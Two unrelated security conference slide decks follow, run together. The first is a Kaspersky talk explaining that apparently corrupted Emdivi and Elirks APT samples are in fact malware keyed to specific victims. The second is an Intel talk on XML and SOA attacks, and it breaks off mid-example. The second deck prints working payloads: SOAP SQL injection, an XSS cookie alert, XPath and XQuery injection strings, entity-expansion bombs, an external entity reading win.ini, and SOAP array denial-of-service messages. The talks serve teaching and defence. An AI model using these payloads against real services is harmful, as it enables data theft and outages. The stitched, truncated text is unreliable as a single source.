WHY CORRUPTED (?) SAMPLES IN
RECENT APT?
-CASE OF JAPAN AND TAIWAN
By Suguru Ishimaru
Dec 2016
Introduction
3 |
Introduction
$ whoami
Suguru_ISHIMARU
$ whois suguru_ishimaru
Job_title: Researcher
Department: Global Research Analysis Team
Organization: Kaspersky Labs
E-mail: suguru.ishimaru[at]kaspersky.com
https://securelist.com/blog/events/75730/conference-report-hitcon-2016-in-taipei/
My last blogpost was Conference Report:
HITCON 2016 in Taipei
Contents
5 |
Contents
$ history | tail -n5
139 problem
140 motivation
141 emdivi
143 elirks
144 conclusion
Problem
7 |
Problem: A lot of targeted attacks
More than 40 APT
8 |
Problem: The biggest issue is...
Question: What is the biggest problem in APT seen from
antivirus side?
Hard work
No detect
No sample
We collect mass spread samples. However, we could not get APT samples
easily. Especially, second stage sample is extremely rare.
9 |
Problem: Corrupted samples
We found samples, sometimes they were corrupted. That
means they are executable but crashing:
1. Memory dump
2. Unknown binary data
3. Broken data
4. Cured by Anti Virus
5. Quarantined file
6. Password encrypted archive without password
10 |
Problem: Why corrupted samples?
Question: Why corrupted samples in recent APT?
I will tell you my answer
in conclusion
Motivation
12 |
Motivation: What should we do?
Question: What should we do when we got corrupted
malware in APT?
Just Ignore
Deep Analysis
Make AV signature
1. Checking really corrupted or not
2. Getting information of related others
13 |
Motivation: Two recent APT cases
Probably corrupted (?) samples have found in two recent APT.
Emdivi
Elirks
Emdivi
15 |
Emdivi: Overview
1.
The Blue Termite APT campaign
2.
Target region is Japan mainly
3.
C2s on compromised legitimate sites
4.
spear phishing email
5.
drive-by dowonload
6.
Watering hole attacks
7.
CVE-2014-7247
8.
CVE-2015-5119
16 |
Japan pension service Emdivi + PlugX
MAY 2015
Security report about APT (Emdivi) by Macnica
MAY 2016
Target to web site in Taiwan
JUL 2011
Operation CloudyOmega by Symantec
NOV 2014
Oldest sample of Emdivi
NOV 2013
New activity of the Blue Termite APT by Kaspersky
AUG 2015
Attacks of Flash Player 0day (CVE-2015-5119) by Trendmicro
JUL 2015
Emdivi: History
17 |
Emdivi: Infection vector
spear phishing e-mail
drive by download
watering hole attacks
CVE-2015-5119
self-extracting archives (SFX) file
emdivi t17
emdivi t20
18 |
Emdivi: Target
Industries:
1.
Government
2.
Universities
3.
Financial services
4.
Energy
5.
Food
6.
Heavy industry
7.
Chemical
8.
News media
9.
Health care
10. Insurance
11. Security researcher
12. Internet service provider
Regions:
•
Japan
•
Taiwan
To create infrastructure
Japan Hosting provider
Taiwan web site
19 |
Emdivi: Corrupted (?) samples
We collected more than 600
samples related to this attacks,
around 25 percents were Emdivi
samples.
Among them, 6 percents did not
work.
20 |
Emdivi: Important data was encrypted
Emdivi family stores encrypted important data:
C2, API name, strings for anti-analysis, value of mutexes, as well as
the md5 checksum of backdoor commands and the internal proxy
information
generate_base_key
salt1 = md5sum(version.c2id...)
aes key (16 byte)
xxtea key (32 byte)
salt2 = hardcoded long data
Modified xxtea_decrypt
encrypted data
%program files%
21 |
Emdivi: Corrupted (?) ustomized samples
Is it possible to analyze?
generate_base_key
salt1 = md5sum(version.c2id...)
aes key (16 byte)
xxtea key (32 byte)
salt2 = hardcoded long data
xxtea_decrypt + add and sub
encrypted data
unknown data
salt3 = SID of specific victim
%program files%
We could brute force a xxtea key
22 |
Emdivi: Corrupted (?) ustomized samples
Is it possible to analyze?
No
We published the details as a blog
in securelist.com
23 |
Emdivi: DEMO
Emdivi t20 AES + SID
Elirks
25 |
Elirks: Overview
1.
As known as PLURK
2.
The Elirks APT campaign
3.
Unique schema to connect real C2
4.
Target Regions are Taiwan, Japan
5.
Trojan dropper is fake folder icon
6.
Decoys were sometimes airline e-ticket
This group uses several types of malware
Elirks, Ymailer, Ymailer-mini and Micrass.
This presentation is forcusing Elirks
26 |
Elirks: History
Chasing Advanced Persistent Threats (APT) by SecureWorks
JUL 2012
Let’s Play Hide and Seek In the Cloudby Ashley, Belinda
AUG 2015
Oldest Elirks sample
MAR 2010
Hunting the Shadows by Fyodor Yarochkin, Pei Kan PK Tsung,
Ming-Chang Jeremy Chiu, Ming-Wei Benson Wu
JUL 2013
Japan Tourist Bureau (JTB) Elirks + PlugX
MAR 2016
NOV 2016
Japan Business Federation Elirks + PlugX
Tracking Elirks Variants in Japan: Similarities to Previous Attacks by paloalto
JUN 2016
MILE TEA: Cyber Espionage Campaign Targets Asia Pacific
Businesses and Government Agencies by paloalto
SEP 2016
BLACKGEAR Espionage Campaign Evolves by trendmicro
OCT 2016
27 |
Elirks: Infection vector
spear phishing e-mail
Trojan dropper spoofing
folder icon
fake folder icon: 78 %
create dir, decoy and delete it
self
Elirks malware
28 |
Elirks: Target
Regions:
•
Taiwan
•
Japan
Industries:
1.
Government
2.
Universities
3.
Heavy industry
4.
News media
5.
Trading
6.
Airline
7.
Travel agency
Decoys of airline e-ticket
Japan
Taiwan
29 |
Elirks: Unique schema to connect real C2
The Elirks malware has unique schema to connect real C2. It connects blogpost of legitimate
site getting encrypted real C2 information.
Decrypt function
Malware config
A post in legitimate blog
Real C2
30 |
Elirks: Corrupted (?) samples
We collected more than 200
samples.
Among them, less than 3 percent
were probably corrupted.
Then we confirmed why these
samples does not work.
31 |
Elirks: Elirks has three encrypted data
0x417530 encrypted data (10768 byte)
0x419F40 encrypted data (10736 byte)
0x41FF88 encrypted data (1504 byte)
aes_decrypt
generate_base_key
data_of_key_salt
aes_expkey_array[4]
0x401000 malware func1 (10768 byte)
0x405CF0 malware func2 (10736 byte)
0x41FF88 malware config (1504 byte)
aes key (16 byte)
anti emu key (1 byte / 2 byte)
32 |
Elirks: Decrypted Elirks
0x401000 unknown data (10768 byte)
0x405cf0 unknown data (10736 byte)
0x41FF88 encrypted data (1504 byte)
0x401000 malware func1 (10768 byte)
0x405CF0 malware func2 (10736 byte)
0x41FF88 malware config (1504 byte)
33 |
Elirks: Corrupted (?) samples
A corrupted (?) sample does not decrypt malware config.
That means does not work and can not analyze.
0x41CE28 encrypted data (1504 byte)
0x41CE28 malware config (1504 byte)
34 |
Elirks: DEMO
Elirks probably corrupted (?) sample
35 |
Elirks: Corrupted (?) ustomized samples
It was customized sample for specific victims
Compare specific dir and current dir to extract 4 bytes xor key as part of generate AES key
0x41CE28 encrypted data (1504 byte)
0x41CE28 malware config (1504 byte)
aes key (16 byte)
aes key (16 byte)
Conclusion
37 |
Conclusion: Answer of my title’s question
Question: Why corrupted (?) samples in recent APT?
It’s not corrupted.
The attacker developed
customized malware
When you find corrupted sample,
It might to be chance of analysis very interesting APT malware
38 |
Conclusion: Whitelist approach in APT
Common malware should work in any environment.
APT malware have to work in specific environment.
This approach and introduced new techniques are
very simple ,However it works effectively.
39 |
Thank You
suguru.ishimaru[at]kaspersky.com | pdf |
The SOA/XML Threat Model
and New XML/SOA/Web 2.0 Attacks & Threats
Steve Orrin
Dir of Security Solutions, SSG-SPI
Intel Corp.
Agenda
•Intro to SOA/Web 2.0 and the Security Challenge
•The XML/SOA Threat Model
•Details on XML/Web Services & SOA Threats
•Next Generation and Web 2.0 Threats
•The Evolving Enterprise and Environment
•Summary
•Q&A
What is SOA?
A service-oriented architecture is essentially a collection of services.
These services communicate with each other and the communication can
involve either simple data passing or direct application execution also it
could involve two or more services coordinating some activity.
What is a Service?
•
A service is a function that is well-defined, self-contained, and does not
depend on the context or state of other services.
What is a Web Service?
•
Typically a web service is XML/SOAP based and most often described
by WSDL and Schemas. In most SOA implementations a directory
system known as UDDI is used to for Web Service discovery and
central publication.
What is Web 2.0?
Web 2.0, a phrase coined by Tim O'Reilly and popularized by the first Web 2.0
conference in 2004, refers to a second generation of web-based communities
and hosted services — such as social-networking sites, wikis and folksonomies
— which facilitate collaboration and sharing between users.
Although the term suggests a new version of the World Wide Web, it does not
refer to an update to Web technical specifications, but to changes in the ways
software developers and end-users use the web as a platform.
Characteristics of Web 2.0
•
The transition of web-sites from isolated information silos to sources of
content and functionality, thus becoming computing platforms serving web
applications to end-users
•
A social phenomenon embracing an approach to generating and distributing
Web content itself, characterized by open communication, decentralization of
authority, freedom to share and re-use, and "the market as a conversation"
•
Enhanced organization and categorization of content, emphasizing deep
linking
Source: Wikipedia, the free encyclopedia
http://en.wikipedia.org/wiki/Web_2
It’s a SOA World after all…
Fortune 1000 customers are deploying
datacenter SOA and Web Services apps today
Average XML network traffic load of 24.4%
expected to grow to 35.5% next year
Average number of WS applications across
enterprise companies is up 300% over the last
year
Gartner predicts 46% of IT professional services
market is Web Services related in 2010
Web Services are now the preferred choice for
application development - although performance
barriers prevent widespread implementation
Why SOA? – The Cruel Reality
Screen
Scrape
Screen
Scrape
Screen
Scrape
Screen
Scrape
Message
Queue
Message
Queue
Message
Queue
Download
File
Download
File
Download
File
Transactio
n
File
Transaction
File
Transaction
File
ORB
ORB
CICS Gateway
CICS Gateway
APPC
APPC
RPC
RPC
Transaction
File
Sockets
Sockets
Message
Message
Application
Application
Application
Application
Application
Application
Application
Application
Application
Application
Where do SOA Apps & Web 2.0 data come from?
EDI Replacement
Decoupling of DB from C/S apps
EAI & Portals
e-Commerce
ERP/CRM/SFA/SCM
Social Networking & Collaboration
End User data
EAI
The SOA Implementation Roadmap
Example of Services Server Stack
Operating System
Linux, Solaris, Windows, Apple
OS service & libs
NPTL, OpenLDAP
Security libs
PHP
Hardware
NuSOAP
Web Services and RIAs
Web Services
hosting & caching
Apache, Jetty,..
Database
MySQL
postgreSQL
Perl
Ruby
Base support for
Web services
C/C++
Java
Axis
SOAP4R
SOAP::Lite
gSOAP
Custom tools
perf analyzer
Web services
popular languages
Web service
instrumentation
tools
Other
Compilers
Vmware/Xen/KVM
ESB,
Message
Queuing
GWT
This part is
flexible
Some Typical Web 2.0 Server Environments
•LAMP = Linux, Apache, MySQL, PHP (or Perl or Python)
•MAMP = Mac OS X, Apache, MySQL, PHP
•LAMR = Linux, Apache, MySQL, Ruby
•WAMP = Microsoft Windows, Apache, MySQL, PHP
•WIMP = Windows, IIS, MySQL, and PHP
•WIMSA or WISA = Windows, IIS, Microsoft SQL Server, ASP
•WISC = Windows, IIS, SQL Server, and C#
•WISP = Windows, IIS, SQL Server, and PHP
•JOLT = Java, Oracle, Linux, and Tomcat
•STOJ = Solaris , Tomcat, Oracle and Java
SOA Business Drivers
Effective Reuse of IT Applications & Systems
•
IT layers & applications
•
Across organization & trust boundaries
Reduce IT Complexity
•
Implementation (language/platform agnostic)
•
Standards-based application interaction
Faster IT results at lower costs
•
Easier Fellow Traveler & internal system integration
•
Less “custom” software/adapters/B2B Gateways
•
Easier to introduce new services
Why is security so important in SOA
•Drastic & Fundamental shift in Authentication &
Authorization models
•Real Business apps affected
•Non repudiation
•Externalization of application functionality and loss of
internal controls
•Next generation threats and new risks
Increasing Risks
Time-to-Market
Complexity is Growing
•
Mixed Bag of Standards
•
Interoperability, reuse, etc.
Increasing Business Risks
•
Continued Rise in malicious activity
•
Government scrutiny and
regulation pressures (HIPAA, GLBA,
SB1386, etc..)
•
Liability precedents for security
incidents
The New Frontier
•
Many of the attacks occur at the
Application/Service layers
Reported Vulnerabilities & Incidents
0
1,000
2,000
3,000
4,000
5,000
6,000
7,000
8,000
9,000
2000
2001
2002
2003
2004
2005
2006
0
50,000
100,000
150,000
200,000
250,000
300,000
350,000
400,000
Source: CERT & CSI/FBI Survey
Vulnerabilities Reported
Incidents Reported
Old Attacks still valid
•
Common Web Vulnerabilities
•
Injection Attacks
•
Buffer Overflow
•
Denial of Service
The New Manipulation Attacks
•
Entity and Referral Attacks
•
DTD and Schema Attacks
The Next Generation Attacks
•
Web Service Enabled Application Attacks
•
Multi-Phase Attacks
XPATH Injection
XML/Web Services Attacks
Cross-Site Scripting in
Client Side XML
Documents
SAP/BAPI attacks via
SOAP
Endless loop Denial of
service Attacks
Schema Redirection
Attacks
SQL Injection in
XQuery
Entity Expansion Attacks
Command Injection
SOAP Attacks
SOA/XML Threat Model
Payload / Content threats
•
Back End Target
– Ex: SQL Injection, BAPI Protocol attack, Universal Tunnel Misuse
•
End User Target
– Ex: XSS, Malicious Active Content
XML Misuse/Abuse
– Ex: XML Injection, XPath Injection, XQuery Injection,
XML Structure Manipulation
– Ex: Entity Expansion, Referral Attacks, Schema Poisoning
Infrastructure Attacks
– Ex: Buffer overflow of Server
– Ex: DNS Poisoning for CA Server
XML/SOA Threat Model
Payload / Content threats
•
Payload and Content threats use XML as a carrier for malicious code
and content.
•
Many of the existing web and application layer threats can leverage
XML formats for delivery of the attack to targets.
•
This category can be divided into two sub-categories:
– Back End Target: the attacker uses the XML flow/message to attack a
target application.
– End User Target: targets the browser or client application of the service
end user.
•
One of the key differentiators of XML threats in general is that often
times the XML document is persistent and lives on beyond the
transaction.
– This leads to longer term threat as an attack can be delivered before the
actual attack occurs.
XML/SOA Threat Model
XML Misuse/Abuse
•
Here XML structures and methods are misused to cause
malicious outcomes.
– As powerful a language XML and its uses are for the developer
and application infrastructure, it is equally powerful for the
attacker.
•
In the Misuse example of XPath Injection:
– The attacker can leverage the advanced functionality of XPath
querying to perform more targeted and deeper invasions than its
Web cousin SQL injection.
– One example of this is the Blind XPath Injection attack
XML/SOA Threat Model
XML Structure Manipulation
•
Malicious XML structures and formats.
•
Most of these attacks use legitimate XML constructs in malicious ways.
–
Two common examples of this are Entity attacks (both External and Expansion based) and
DTD/Schema based threats.
–
The most common example of Entity threat is the Entity Expansion attack.
•
The malicious XML message is used to force recursive entity expansion (or other repeated
processing) that completely uses up available server resources.
•
The first example of this type of attack was the "many laughs" attack (some times called the
‘billion laughs’ attack).
<!DOCTYPE root [
<!ENTITY ha "Ha !">
<!ENTITY ha2 "&ha; &ha;">
<!ENTITY ha3 "&ha2; &ha2;">
<!ENTITY ha4 "&ha3; &ha3;">
<!ENTITY ha5 "&ha4; &ha4;">
...
<!ENTITY ha128 "&ha127; &ha127;">
]>
<root>&ha128;</root>
–
In the above example, the CPU is monopolized while the entities are being expanded, and each
entity takes up X amount of memory - eventually consuming all available resources and
effectively preventing legitimate traffic from being processed.
XML/SOA Threat Model
XML Structure Manipulation
•The Schema Poisoning attack is one of the earliest reported forms of
XML threat.
•
XML Schemas provide formatting and processing instructions for
parsers when interpreting XML documents.
•
Schemas are used for all of the major XML standard grammars
coming out of OASIS.
•
A schema file is what an XML parser uses to understand the XML’s
grammar and structure, and contains essential preprocessor
instructions.
•Because these schemas describe necessary pre-processing
instructions, they are very susceptible to poisoning.
XML/SOA Threat Model
Infrastructure Attacks
•
Targeting the infrastructure that supports SOA and web services to
disrupt or compromise the services and
– Infrastructure misuse.
•
An example of infrastructure target is to DoS the application server
hosting the services thus causing DoS to the service as well.
•
A more complex example is DNS Poisoning of the CA server used by the
SOA infrastructure to validate signatures.
Payload/Content Threat
Examples
SOAP: SQL Injection Example
<soap:Envelope xmlns:soap=“ “>
<soap:Body>
<fn:PerformFunction xmlns:fn=“ “>
<fn:uid>’or 1=1 or uid=‘</fn:uid>
<fn:password>1234</fn:password>
</fn:PerformFunction>
</soap:Body>
</soap:Envelope>
Source: Steve Orrin
XSS in XML Example
<?xml version="1.0"?>
<soap:Envelope
xmlns:soap="http://www.w3.org/2001/12/soap-envelope"
soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
<soap:Body xmlns:m="http://www.stock.com/stock">
<m:GetStockPrice>
<m:StockName>%22%3e%3c%73%63%72%69%70%74%3e
>%22%3e%3c%73%63%72%69%70%74%3e
alert(document.cookie)%3c%2f%73%63%72%69%70%74%3e
alert(document.cookie)%3c%2f%73%63%72%69%70%74%3e
</m:StockName>
</m:GetStockPrice>
</soap:Body>
</soap:Envelope>
Source: Steve Orrin
XML Misuse and Abuse
Threat Examples
XQuery Injection
•XQuery is a SQL like language.
–
It is also flexible enough to query a broad spectrum of XML information sources,
including both databases and documents.
•XQuery Injection is an XML variant of the classic SQL injection attack.
–
Uses improperly validated data that is passed to XQuery commands to traverse and
execute commands that the XQuery routines have access to.
–
Can be used to enumerate elements on the victim's environment, inject commands to
the local host, or execute queries to remote files and data sources.
–
An attacker can pass XQuery expressions embedded in otherwise standard XML
documents or an attacker may inject XQuery content as part of a SOAP message
causing a SOAP destination service to manipulate an XML document incorrectly.
•
The string below is an example of an attacker accessing the users.xml to
request the service provider send all user names back.
doc(users.xml)//user[name='*']
•
The are many forms of attack that are possible through XQuery and are very
difficult to predict, if the data is not validated prior to executing the XQL.
Source: Steve Orrin
XPath Injection
•XPath is a language used to refer to parts of an XML document.
•
It can be used directly by an application to query an XML document, or as part of
a larger operation such as applying an XSLT transformation to an XML document,
or applying an XQuery to an XML document.
•Why XPath Injection?
•
Traditional Query Injection:
–
' or 1=1 or ''= '
•
XPath injection:
–
abc' or name(//users/LoginID[1]) = 'LoginID' or 'a'='b
•
XPath Blindfolded Injection
–
Attacker extracts information per a single query injection.
•
The novelty is:
–
No prior knowledge of XPath query format required (unlike “traditional” SQL Injection
attacks).
–
Whole XML document eventually extracted, regardless of XPath query format used by
application
•
http://www.packetstormsecurity.org/papers/bypass/Blind_XPath_Injection_20040518.pdf
Source: Amit Klein
http://www.webappsec.org/whitepapers.shtml
Structural Manipulation
Threat Examples
The Schema Poisoning attack
Here is an example of a XML Schema for a order shipping application:
<?xml version="1.0" encoding="ISO-8859-1" ?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="ship_order">
<xs:complexType>
<xs:sequence>
<xs:element name="order" type="xs:string"/>
<xs:element name="shipping">
<xs:complexType>
<xs:sequence>
<xs:element name="name" type="xs:string"/>
<xs:element name="address" type="xs:string"/>
<xs:element name="zip" type="xs:string"/>
<xs:element name="country" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>
…
</xs:schema>
An attacker may attempt to compromise the schema in its stored location and replace it with a
similar but modified one.
An attacker may damage the XML schema or replace it with a modified one which would then
allow the parser to process malicious SOAP messages and specially crafted XML files to inject OS
commands on the server or database.
The Schema Poisoning attack
Here is the schema after a simple poisoning
<?xml version="1.0" encoding="ISO-8859-1" ?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="ship_order">
<xs:complexType>
<xs:sequence>
<xs:element name="order"/>
<xs:element name="shipping">
<xs:complexType>
<xs:sequence>
<xs:element name="name"/>
<xs:element name="address "/>
<xs:element name="zip"/>
<xs:element name="country"/>
</xs:sequence>
</xs:complexType>
</xs:element>
…
</xs:schema>
In this example of Schema Poisoning, by removing the various Schema conditions and
strictures the attacker is free to send a malicious XML message that may include content
types that the application is not expecting and may be unable to properly process.
Schema Poisoning may also be used to implement Man in the Middle and Routing detour
attacks by inserting extra hops in the XML application workflow.
Source: Steve Orrin & W3C XML Schema
www.w3.org/XML/Schema
Type: Data Theft/System Compromise
Target: XML Parsers
The attack on an Application Server
1. Find a web service which echoes
back user data such as the parameter "in"
2. Use the following SOAP request
3. And you'll get
C:\WinNT\Win.ini in the response (!!!)
How it works:
A. The App Server expands the entity “foo” into full text, gotten
from the entity definition URL - the actual attack takes place
at this phase (by the Application Server itself)
B. The App Server feeds input to the web service
C. The web service echoes back the data
...
<!DOCTYPE root [
<!ENTITY foo SYSTEM
"file:///c:/winnt/win.ini">
]>
...
<in>&foo;</in>
XML Entity Expansion/Referral Attack
Source: Amit Klein
Quadratic Blowup DoS attack
Type: Denial of Service
Target: XML Parsers
Attacker defines a single huge entity (say, 100KB), and references it many times
(say, 30000 times), inside an element that is used by the application (e.g. inside a
SOAP string parameter).
<?xml version=”1.0”?>
<!DOCTYPE foobar [<!ENTITY x “AAAAA… [100KB of them] … AAAA”>]>
<root>
<hi>&x;&x;….[30000 of them] … &x;&x;</hi>
</root>
Source: Amit Klein
DoS attack using SOAP arrays
Type: Denial of Service
Target: SOAP Interpreter
A web-service that expects an array can be the target of a DoS attack by forcing
the SOAP server to build a huge array in the machine’s RAM, thus inflicting a DoS
condition on the machine due to memory pre-allocation.
<soap:Envelope xmlns:soap=“ “>
<soap:Body>
<fn:PerformFunction xmlns:fn=“ “ xmlns:ns=“ “>
<DataSet xsi:type="ns:Array"
ns:arrayType=" xsd:string[100000]">
<item xsi:type="xsd:string"> Data1</item>
<item xsi:type="xsd:string"> Data2</item>
<item xsi:type="xsd:string"> Data3</item>
</DataSet>
</fn:PerformFunction>
</soap:Body>
</soap:Envelope>
Source: Amit Klein
Array href Expansion
Type: Denial of Service
Target: SOAP Interpreter
This attack sends an array built using a quadratic expansion of elements. This allows the array to be built and
sent relatively cheaply on the attacking side, but the amount of information on the server will be enormous.
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope… xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Header>
<input id="q100" xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="xsd:int[10]">
<int xsi:type="xsd:int">7</int>
<int xsi:type="xsd:int">7</int>
... and so on
</input>
<input id="q99" xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="SOAP-ENC:Array[10]">
<arr href="#q100" xsi:type="SOAP-ENC:Array" />
<arr href="#q100" xsi:type="SOAP-ENC:Array" />
... and so on
</input>
</soapenv:Header>
<soapenv:Body>
<ns1:getArray xmlns:ns1="http://soapinterop">
<input href="#q99" />
</ns1:getArray>
</soapenv:Body>
</soapenv:Envelope>
Source CADS & Steve Orrin
http://www.c4ads.org
Unclosed Tags (Jumbo Payload)
Type: Denial of Service
Target: XML Parsers
This attack sends a SOAP packet to a web service. The actual SOAP packet sent to the web
service contains unclosed tags with the “mustUnderstand” attribute set to 1.
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
…
xmlns:ns2="http://xml.apache.org/xml-soap">
<soapenv:Header>
<input id="q0" mustUnderstand="1" xsi:type="SOAP-ENC:Array"
SOAP-ENC:arrayType="xsd:int[1]">
<i>
<i>
... and so on
Source CADS & Steve Orrin
http://www.c4ads.org
Name Size (Jumbo Payload)
Type: Denial of Service
Target: XML Parsers
This attack sends a SOAP packet that contains an extremely long element name to the web
service.
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
…
xmlns:ns2="http://xml.apache.org/xml-soap">
<soapenv:Header>
<input id="q0" mustUnderstand="1" xsi:type="SOAP-ENC:Array“
SOAP-ENC:arrayType="xsd:int[1]">
<Iasdfafajnasddjfhaudsfhoiwjenbkjfasdfiuabkjwboiuasdjbfaiasdfafajnasddjfhaudsfhoi
wjenbkjfasdfuabkjwboiuasdjbfa ... and so on>
Source CADS & Steve Orrin
http://www.c4ads.org
Attribute Name Size (Jumbo Payload)
Type: Denial of Service
Target: XML Parser, XML Interpreter
Similar to the other jumbo payload attacks. This attack uses large attribute names to attempt
to overwhelm the target. Many parsers have set buffer sizes, in which case this can overflow
the given buffer.
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope…xmlns:ns2="http://xml.apache.org/xml-soap">
<soapenv:Header>
<input id="q0" xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="xsd:int[1]"
z0z1z2z3z4z5z6z7z8z9(... and so on)="5">
<int xsi:type="xsd:int">10</int>
</input>
</soapenv:Header>
<soapenv:Body>
<ns1:getArray xmlns:ns1="http://soapinterop">
<item href="#q0" xsi:type="SOAP-ENC:Array" />
</ns1:getArray>
</soapenv:Body>
</soapenv:Envelope>
Source CADS & Steve Orrin
http://www.c4ads.org
Reading Blocking Pipes using External Entities
Type: Denial of Service
Target: XML Parsers
This attack abuses external entities by using them to read blocking pipes such as /de-v/stderr
on Linux systems. This causes the processing thread to block forever (or until the application
server is restarted). Repetitive use of this attack could cause a DoS once all threads are used
up.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE base [
<!ENTITY test0 SYSTEM "/dev/stderr">
<base>&test0</base>
…
Source CADS & Steve Orrin
http://www.c4ads.org
Repetitive Loading of Onsite Services Using Entities
Type: Denial of Service
Target: XML Parsers
This attack abuses external entities to repetitively load expensive onsite
services to effect a denial of service. This is extremely effective as it has
the result of the server doing the majority of the work while the attacker
just tells it which pages to load.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE base [
<!ENTITY test0 SYSTEM "http://192.168.2.183:8080/axis/ArrayTest.jws?wsdl">
<!ENTITY test1 SYSTEM "http://192.168.2.183:8080/axis/ArrayTest.jws?wsdl">
<!ENTITY test2 SYSTEM "http://192.168.2.183:8080/axis/ArrayTest.jws?wsdl">
<!ENTITY test3 SYSTEM "http://192.168.2.183:8080/axis/ArrayTest.jws?wsdl">
<base>&test0;&test1;&test2;&test3;</base>
…
Source CADS & Steve Orrin
http://www.c4ads.org
Other Threats
Threat
Description
WSDL
Scanning
Web Services Description Language (WSDL) is an advertising mechanism for web services to dynamically describe
the parameters used when connecting with specific methods. These files are often built automatically using
utilities. These utilities, however, are designed to expose and describe all of the information available in a
method. In addition, the information provided in a WSDL file may allow an attacker to guess at other methods.
Coercive
Parsing
Exploits the legacy bolt-on - XML-enabled components in the existing infrastructure that are operational. Even
without a specific Web Services application these systems are still susceptible to XML based attacks whose main
objective is either to overwhelm the processing capabilities of the system or install malicious mobile code.
Content &
Parameter
Tampering
Since instructions on how to use parameters are explicitly described within a WSDL document, malicious users
can play around with different parameter options in order to retrieve unauthorized information. For example by
submitting special characters or unexpected content to the Web service can cause a denial of service condition or
illegal access to database records.
XML Virus &
X-Malware
Although looking like a real XML document, this XML Viruses contain malicious code that can be activated by
trying to parse the file
Oversize
Payloads &
XDOS
While an developers may try to limit the size of a document, there are a number of reasons to have XML
documents that are hundreds of megabytes or gigabytes in size. Parsers based on the DOM model are especially
susceptible to this attack given its need to model the entire document in memory prior to parsing
Replay
Attacks
A hacker can issue repetitive SOAP message requests in a bid to overload a Web service. This type of network
activity will not be detected as an intrusion because the source IP is valid, the network packet behavior is valid
and the HTTP request is well formed. However, the business behavior is not legitimate and constitutes an XML-
based intrusion. In this manner, a completely valid XML payloads can be used to issue a denial of service attack.
Routing
Detour
The WS-Routing specification provides a way to direct XML traffic through a complex environment. It operates by
allowing an interim way station in an XML path to assign routing instructions to an XML document. If one of these
web services way stations is compromised, it may participate in a man-in-the-middle attack by inserting bogus
routing instructions to point a confidential document to a malicious location. From that location, then, it may be
possible to forward on the document, after stripping out the malicious instructions, to its original destination.
Source: Pete Lindstrom, Research Director for Spire, January 2004
www.forumsystems.com/papers/Attacking_and_Defending_WS.pdf
Future & Next Generation Attacks
More Backend targeted Attacks
•
Exploit Known Vulnerabilities in ERP, CRM, Mainframe, Databases
•
Using Web Services as the Attack carrier
Emergence of Multi-Phase Attacks
•
Leverage the distributed nature of Web Services & persistence of XML documents to
execute complex multi-target attacks
•
Examples:
–
DNS Poisoning for CA Server + Fraudulently signed XML transactions
–
Specially crafted Malware delivery methods using XML
–
Advanced Phishing and Pharming using XSS in XML
Universal Tunnel Abuse
•
Universal tunnel is where an attacker or as in many cases a insider with ‘good’
intentions uses XML and Web Services to expose internal or blocked protocols to the
outside.
•
XML Web Services will implement existing network protocols leading to misuse and
piggybacking of:
– FTP/Telnet/SSH/SCP/RDP/IMAP…
Web 2.0 Attacks
Web 2.0 Attacks
Web 2.0 and RIA (Rich Internet Applications)
•AJAX Vulnerabilities
•RSS based Threats
•XSS Worms – Sammy, QT/MySpace
Quick AJAX Overview
Source: Billy Hoffman Lead Security Researcher
for SPI Dynamics (www.spidynamics.com)
AJAX Vulnerabilities: Information Leakage
The JavaScript in the Ajax engine traps the user commands and makes
function calls in clear text to the server.
Examples of user commands:
• Return price for product ID 24
• Return valid cities for a given state
• Return last valid address for user ID 78
• Update user’s age in database
Function calls provide “how to” information for each user command that is sent.
•
Is sent in clear text
The attacker can obtain:
•
Function names, variable names, function parameters, return types, data types,
and valid data ranges.
Source: Billy Hoffman Lead Security Researcher
for SPI Dynamics (www.spidynamics.com)
AJAX Vulnerabilities:
Repudiation of Requests and Cross-Site Scripting
Browser requests and Ajax engine requests look identical.
•
Server are incapable of discerning a request made by JavaScript and a
request made in response to a user action.
•
Very difficult for an individual to prove that they did not do a certain action.
•
JavaScript can make a request for a resource using Ajax that occurs in the
background without the user’s knowledge.
–
The browser will automatically add the necessary authentication or state-keeping
information such as cookies to the request.
•
JavaScript code can then access the response to this hidden request and then
send more requests.
This expanded JavaScript functionality increases the damage of a
Cross-Site Scripting (XSS) attack.
Source: Billy Hoffman Lead Security Researcher
for SPI Dynamics (www.spidynamics.com)
AJAX Vulnerabilities: Ajax Bridging
The host can provide a Web service that acts as a proxy to forward traffic
between the JavaScript running on the client and the third-party site.
–
A bridge could be considered a “Web service to Web service” connection.
–
Microsoft’s “Atlas,” provide support for Ajax bridging.
–
Custom solutions using PHP or Common Gateway Interfaces (CGI) programs can also
provide bridging.
An Ajax bridge can connect to any Web service on any host using protocols
such as:
–
SOAP & REST
–
Custom Web services
–
Arbitrary Web resources such as RSS feeds, HTML, Flash, or even binary content.
An attacker can send malicious requests through the Ajax bridge as
well as take advantage of elevated privileges often given to the
Bridge‘s original target.
Source: Billy Hoffman Lead Security Researcher
for SPI Dynamics (www.spidynamics.com)
RSS Feeds: Attack Delivery Service
RSS Feeds provide links and content to RSS enabled apps and
aggregators
Malicious links and content can be delivered via the RSS method
Can be used to deliver XSS and XML Injection attacks
Can be used to deliver malicious code (Both Script and encoded
Binary)
Source: Steve Orrin
Malicious RSS Example
<rdf:RDF
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns="http://purl.org/rss/1.0/"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel rdf:about="http://www.xml.com/cs/xml/query/q/19">
<title>XML.com</title>
<link>http://www.xml.com/</link>
<description>XML.com features a rich mix of information and services for the XML community.</description>
<language>en-us</language>
<items>
<rdf:Seq>
